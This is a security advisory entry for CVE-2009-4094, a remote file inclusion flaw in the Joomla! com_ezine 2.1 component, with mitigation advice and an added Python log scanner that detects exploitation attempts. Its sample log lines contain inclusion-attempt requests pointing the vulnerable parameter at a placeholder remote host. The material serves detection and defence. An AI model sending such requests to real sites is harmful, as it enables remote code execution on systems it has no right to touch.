PT-2009-6273 · D4J+1 · Com Ezine+1

Published: 2009-11-27 · Updated: 2024-02-14 · CVE-2009-4094

CVSS v2.0: 7.5 (High)

Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions: Joomla! component com_ezine version 2.1

Description: A remote file inclusion issue in the class/php/d4m_ajax_pagenav.php file of the D4J eZine component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[mosConfig_absolute_path] parameter.

Recommendations: For version 2.1, consider disabling the d4m_ajax_pagenav.php file or restricting access to it until a patch is available. Avoid using the GLOBALS[mosConfig_absolute_path] parameter in the affected component to minimize the risk of exploitation.
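
A log check to accompany the recommendation above (an added example, not part of the advisory or of the component's code): it flags access-log requests that reach the affected script and marks those carrying a URL in the GLOBALS[mosConfig_absolute_path] parameter. The underscore spellings, the /components/com_ezine/ path prefix and the log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Names from the advisory text; the underscore spelling is an assumption.
SCRIPT = "d4m_ajax_pagenav.php"
PARAM = "globals[mosconfig_absolute_path]"
# A value that looks like a URL: "scheme://..." or protocol-relative "//host".
URL_LIKE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)
# Request line inside a common/combined-format access-log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return 'inclusion-attempt', 'direct-access' or None for a request target."""
    parts = urlsplit(target)
    # Decode and lowercase the path so %-encoding or case changes do not hide it.
    if not unquote(parts.path).lower().endswith("/" + SCRIPT):
        return None
    # parse_qsl percent-decodes names and values (e.g. %5B -> "[").
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == PARAM and URL_LIKE.search(value):
            return "inclusion-attempt"
    return "direct-access"

def scan(lines):
    """Return [(line_number, verdict)] for log lines that touch the script."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        verdict = classify(match.group(1)) if match else None
        if verdict:
            hits.append((number, verdict))
    return hits

# Constructed sample log lines (documentation addresses, example.invalid host).
BASE = "/components/com_ezine/class/php/"
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Nov/2009:10:00:01 +0000] "GET /index.php?option=com_ezine HTTP/1.1" 200 5120',
    '203.0.113.9 - - [27/Nov/2009:10:00:05 +0000] "GET ' + BASE + 'd4m_ajax_pagenav.php'
    '?GLOBALS%5BmosConfig_absolute_path%5D=http://example.invalid/x.txt%3F HTTP/1.1" 200 312',
    '198.51.100.4 - - [27/Nov/2009:10:01:12 +0000] "GET ' + BASE + 'd4m_ajax_pagenav.php?page=2 HTTP/1.1" 200 900',
    '203.0.113.9 - - [27/Nov/2009:10:02:30 +0000] "GET ' + BASE + 'D4M_AJAX_PAGENAV.PHP'
    '?globals[mosConfig_absolute_path]=//example.invalid/x HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Only the query string is inspected; a request that carries the parameter in a POST body or cookie would show up here as direct-access, which is still worth reviewing once access to the file has been restricted.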

Exploit

Fix

Code Injection

Weakness Enumeration

Related Identifiers: CVE-2009-4094

Affected Products: Joomla!, Com Ezine